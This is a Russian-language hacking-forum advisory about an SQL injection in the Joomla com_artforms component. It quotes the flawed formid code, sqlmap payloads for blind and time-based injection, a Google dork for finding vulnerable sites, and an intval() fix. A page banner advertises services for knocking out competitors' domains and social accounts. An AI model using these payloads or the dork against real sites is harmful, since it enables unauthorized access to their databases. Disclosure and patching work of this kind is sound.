FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
>
Веб-уязвимости
Sql injection Joomla com_artforms
Поиск по форуму
Расширенный поиск
Опции темы
Поиск в этой теме
Опции просмотра
Предыдущая
Следующая
#
1
10.02.2012, 22:55
Machine
Познающий
Регистрация: 23.06.2008
Сообщений: 34
С нами:
9411985
Репутация:
45
1) Дата: 9.02.2012
2) Продукт: Компонент для cms Joomla - Artforms http://joomlacode.org/gf/project/jartforms/
3) Уязвимость: Joomla Component com_artforms SQL injection vulnerability
4) Автор: Machine
5) Тип: удалённая
6) Опасность: 9
7) Описание: описание смысла уязвимости, пример дырявого кода
$formid = JArrayHelper::getValue( $_REQUEST, 'formid' );
$db =& JFactory::getDBO();
saveDBForms( $db, $option, $itemname_todb, $itemdata_todb, $formtitle, $formid );
Параметр formid не фильтруется должным образом перед использованием в запросе. Это можно использовать для
проведения SQL иньекции, вводя произвольный SQL код.
Вывод sqlmap:
GET parameter 'formid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
GET parameter 'formid' is 'MySQL > 5.0.11 AND time-based blind' injectable
GET parameter 'formid' is vulnerable.
При подстановке в formid кавычки, встретил 2 варианта:
1. Страница подменяет контент на "You are not authorised to view this resource. You need to log in."
2. Уязвимый запрос никак не влияет на возвращаемую страницу.
Оба варианта можно эксплуатировать.
8) Эксплоит:
Скуль можно отловить тока временными задержками, т.е. проводя Time-based sql injection.
Вывод sqlmap:
---
Place: GET
Parameter: formid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_artforms&formid=1' AND 6369=6369 AND 'YtSt'='YtSt
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: option=com_artforms&formid=1' AND SLEEP(5) AND 'mZvJ'='mZvJ
---
9) Поиск: пример поиска приложения через поисковые системы
Google dork: inurl:index.php?option=com_artforms
10) Решение: в /components/com_artforms/artforms.php
$formid = JArrayHelper::getValue( $_REQUEST, 'formid' );
поменять на
$formid = intval(JArrayHelper::getValue( $_REQUEST, 'formid' ));
=====================
Видео _http://depositfiles.com/files/j5vqht4y9
=====================
Отдельное спасибо z0mbyak'у.
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
Machine
Посмотреть профиль
Репутация
Отправить личное сообщение для Machine
Найти все сообщения от Machine
Добавить в друзья
«
Предыдущая тема
|
Следующая тема
»
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.